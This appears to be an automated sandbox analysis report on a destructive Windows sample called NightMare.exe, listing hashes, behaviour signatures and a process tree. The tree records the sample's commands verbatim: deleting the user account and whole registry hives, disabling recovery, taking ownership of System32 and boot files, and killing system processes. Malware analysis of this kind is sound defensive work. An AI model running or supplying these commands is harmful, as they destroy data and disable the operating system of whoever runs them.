Analysis

  • max time kernel
    142s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240220-en
  • resource tags

    arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system
  • submitted
    02-03-2024 20:38

General

  • Target

    MyMalwareDatabase-main/MyMalwareDatabase-main/NightMare/NightMare.exe

  • Size

    42KB

  • MD5

    4c5dfe827dd3465bb97016996936fe38

  • SHA1

    010b868fe1a9e637912226a1eda1b73d901347dd

  • SHA256

    366373109445178df10e219c3d58ea40b435c3cc20f80be7398d199aee01f62b

  • SHA512

    e0692e425b7c702d297c88f0495c3bdae53eb566c3128f334d0e87e90a7047c433633f918ab6163a025a488111bcb2f199df0852b338fdc00e524897a2a7d82e

  • SSDEEP

    768:73oACIqXSoiSnWsHorfhH7HjVq9HTtYcFA/Vc6K:7TCxNn/orfhbDVqRD8Vcl

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
  • Disables RegEdit via registry modification 1 IoCs
  • Disables Task Manager via registry modification
  • Possible privilege escalation attempt 18 IoCs
  • Modifies file permissions 1 TTPs 18 IoCs
  • Modifies system executable filetype association 2 TTPs 1 IoCs
  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Drops file in Windows directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Kills process with taskkill 3 IoCs
  • Modifies Control Panel 14 IoCs
  • Modifies File Icons 3 IoCs
  • Modifies registry class 37 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs net.exe
  • Suspicious use of AdjustPrivilegeToken 29 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\MyMalwareDatabase-main\NightMare\NightMare.exe
    "C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\MyMalwareDatabase-main\NightMare\NightMare.exe"
    1⤵
    • UAC bypass
    • Disables RegEdit via registry modification
    • Modifies system executable filetype association
    • Checks whether UAC is enabled
    • Drops file in Windows directory
    • Modifies Control Panel
    • Modifies File Icons
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:1948
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k net user %username% /delete && exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1412
      • C:\Windows\SysWOW64\net.exe
        net user Admin /delete
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2860
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 user Admin /delete
          4⤵
            PID:2580
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /k reg delete HKCR && exit
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1408
        • C:\Windows\SysWOW64\reg.exe
          reg delete HKCR
          3⤵
            PID:2804
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /k reg delete HKU && exit
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:3012
          • C:\Windows\SysWOW64\reg.exe
            reg delete HKU
            3⤵
              PID:2816
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /k reg delete HKLM && exit
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:2144
            • C:\Windows\SysWOW64\reg.exe
              reg delete HKLM
              3⤵
              • Modifies registry key
              PID:1956
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI && pause
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:2300
            • C:\Windows\SysWOW64\takeown.exe
              takeown /F C:\Windows\Boot\DVD\EFI
              3⤵
              • Possible privilege escalation attempt
              • Modifies file permissions
              • Suspicious use of AdjustPrivilegeToken
              PID:3008
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /k reagentc.exe /disable && pause
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:3004
            • C:\Windows\SysWOW64\ReAgentc.exe
              reagentc.exe /disable
              3⤵
                PID:2964
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /k color 47 && takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && Exit
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:2552
              • C:\Windows\SysWOW64\takeown.exe
                takeown /f C:\Windows\System32
                3⤵
                • Possible privilege escalation attempt
                • Modifies file permissions
                • Suspicious use of AdjustPrivilegeToken
                PID:2476
              • C:\Windows\SysWOW64\icacls.exe
                icacls C:\Windows\System32 /grant Admin:F
                3⤵
                • Possible privilege escalation attempt
                • Modifies file permissions
                PID:2612
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI && pause
              2⤵
                PID:6912
                • C:\Windows\SysWOW64\takeown.exe
                  takeown /F C:\Windows\Boot\DVD\EFI
                  3⤵
                  • Possible privilege escalation attempt
                  • Modifies file permissions
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3284
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI && pause
                2⤵
                  PID:7256
                  • C:\Windows\SysWOW64\takeown.exe
                    takeown /F C:\Windows\Boot\DVD\EFI
                    3⤵
                    • Possible privilege escalation attempt
                    • Modifies file permissions
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4508
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\system32\taskmgr.exe && pause
                  2⤵
                    PID:1604
                    • C:\Windows\SysWOW64\takeown.exe
                      takeown /F C:\Windows\system32\taskmgr.exe
                      3⤵
                      • Possible privilege escalation attempt
                      • Modifies file permissions
                      • Suspicious use of AdjustPrivilegeToken
                      PID:6196
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\system32\LogonUI.exe && pause
                    2⤵
                      PID:4676
                      • C:\Windows\SysWOW64\takeown.exe
                        takeown /F C:\Windows\system32\LogonUI.exe
                        3⤵
                        • Possible privilege escalation attempt
                        • Modifies file permissions
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3480
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI\BCD && pause
                      2⤵
                        PID:5136
                        • C:\Windows\SysWOW64\takeown.exe
                          takeown /F C:\Windows\Boot\DVD\EFI\BCD
                          3⤵
                          • Possible privilege escalation attempt
                          • Modifies file permissions
                          • Suspicious use of AdjustPrivilegeToken
                          PID:5692
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI\boot.sdi && pause
                        2⤵
                          PID:3456
                          • C:\Windows\SysWOW64\takeown.exe
                            takeown /F C:\Windows\Boot\DVD\EFI\boot.sdi
                            3⤵
                            • Possible privilege escalation attempt
                            • Modifies file permissions
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4340
                        • C:\Windows\SysWOW64\cmd.exe
                          "C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\system32\drivers && pause
                          2⤵
                            PID:7720
                            • C:\Windows\SysWOW64\takeown.exe
                              takeown /F C:\Windows\system32\drivers
                              3⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              • Suspicious use of AdjustPrivilegeToken
                              PID:7184
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\servicing\TrustedInstaller.exe && pause
                            2⤵
                              PID:5904
                              • C:\Windows\SysWOW64\takeown.exe
                                takeown /F C:\Windows\servicing\TrustedInstaller.exe
                                3⤵
                                • Possible privilege escalation attempt
                                • Modifies file permissions
                                • Suspicious use of AdjustPrivilegeToken
                                PID:7520
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\System32\WUDFHost.exe && pause
                              2⤵
                                PID:4140
                                • C:\Windows\SysWOW64\takeown.exe
                                  takeown /F C:\Windows\System32\WUDFHost.exe
                                  3⤵
                                  • Possible privilege escalation attempt
                                  • Modifies file permissions
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:5836
                              • C:\Windows\SysWOW64\taskkill.exe
                                "C:\Windows\System32\taskkill.exe" /IM fontdrvhost.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:5852
                              • C:\Windows\SysWOW64\taskkill.exe
                                "C:\Windows\System32\taskkill.exe" /IM dwm.exe.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4328
                              • C:\Windows\SysWOW64\taskkill.exe
                                "C:\Windows\System32\taskkill.exe" /IM TrustedInstaller.exe.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4356
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI && pause
                                2⤵
                                  PID:8996
                                  • C:\Windows\SysWOW64\takeown.exe
                                    takeown /F C:\Windows\Boot\DVD\EFI
                                    3⤵
                                    • Possible privilege escalation attempt
                                    • Modifies file permissions
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4608
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI && pause
                                  2⤵
                                    PID:4168
                                    • C:\Windows\SysWOW64\takeown.exe
                                      takeown /F C:\Windows\Boot\DVD\EFI
                                      3⤵
                                      • Possible privilege escalation attempt
                                      • Modifies file permissions
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:8280
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI && pause
                                    2⤵
                                      PID:6892
                                      • C:\Windows\SysWOW64\takeown.exe
                                        takeown /F C:\Windows\Boot\DVD\EFI
                                        3⤵
                                        • Possible privilege escalation attempt
                                        • Modifies file permissions
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:592
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI && pause
                                      2⤵
                                        PID:3916
                                        • C:\Windows\SysWOW64\takeown.exe
                                          takeown /F C:\Windows\Boot\DVD\EFI
                                          3⤵
                                          • Possible privilege escalation attempt
                                          • Modifies file permissions
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:4036
                                      • C:\Windows\SysWOW64\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI && pause
                                        2⤵
                                          PID:5452
                                          • C:\Windows\SysWOW64\takeown.exe
                                            takeown /F C:\Windows\Boot\DVD\EFI
                                            3⤵
                                            • Possible privilege escalation attempt
                                            • Modifies file permissions
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:6432
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI && pause
                                          2⤵
                                            PID:7176
                                            • C:\Windows\SysWOW64\takeown.exe
                                              takeown /F C:\Windows\Boot\DVD\EFI
                                              3⤵
                                              • Possible privilege escalation attempt
                                              • Modifies file permissions
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:1620

                                        Network

                                        MITRE ATT&CK Enterprise v15

                                        Replay Monitor

                                        Loading Replay Monitor...

                                        Downloads

                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE.txt

                                          Filesize

                                          662B

                                          MD5

                                          21ad42bd4156f914d3a265823a1c269c

                                          SHA1

                                          4129bc994a0947b38e3bac2aeabc8e2fbdbd503f

                                          SHA256

                                          680671bac3f22a5f19ffbd2c82eec069a32844cf93d419aa59319cd0cbc98ac2

                                          SHA512

                                          7ec8c3801798b4fd547578d31badd96edeaacf0a91dca807c04e40ad65d97592043cb8e747947f74b9850f8e99dcd1c8f1c311cb0f8b79be301be36ca884cc5a

                                        • memory/1948-0-0x0000000000AE0000-0x0000000000AF0000-memory.dmp

                                          Filesize

                                          64KB

                                        • memory/1948-1-0x0000000074AA0000-0x000000007518E000-memory.dmp

                                          Filesize

                                          6.9MB

                                        • memory/1948-2-0x0000000004670000-0x00000000046B0000-memory.dmp

                                          Filesize

                                          256KB

                                        • memory/1948-20478-0x0000000074AA0000-0x000000007518E000-memory.dmp

                                          Filesize

                                          6.9MB

                                        • memory/1948-31137-0x0000000004670000-0x00000000046B0000-memory.dmp

                                          Filesize

                                          256KB

                                        • memory/1948-80006-0x0000000004670000-0x00000000046B0000-memory.dmp

                                          Filesize

                                          256KB

                                        • memory/1948-80027-0x0000000004670000-0x00000000046B0000-memory.dmp

                                          Filesize

                                          256KB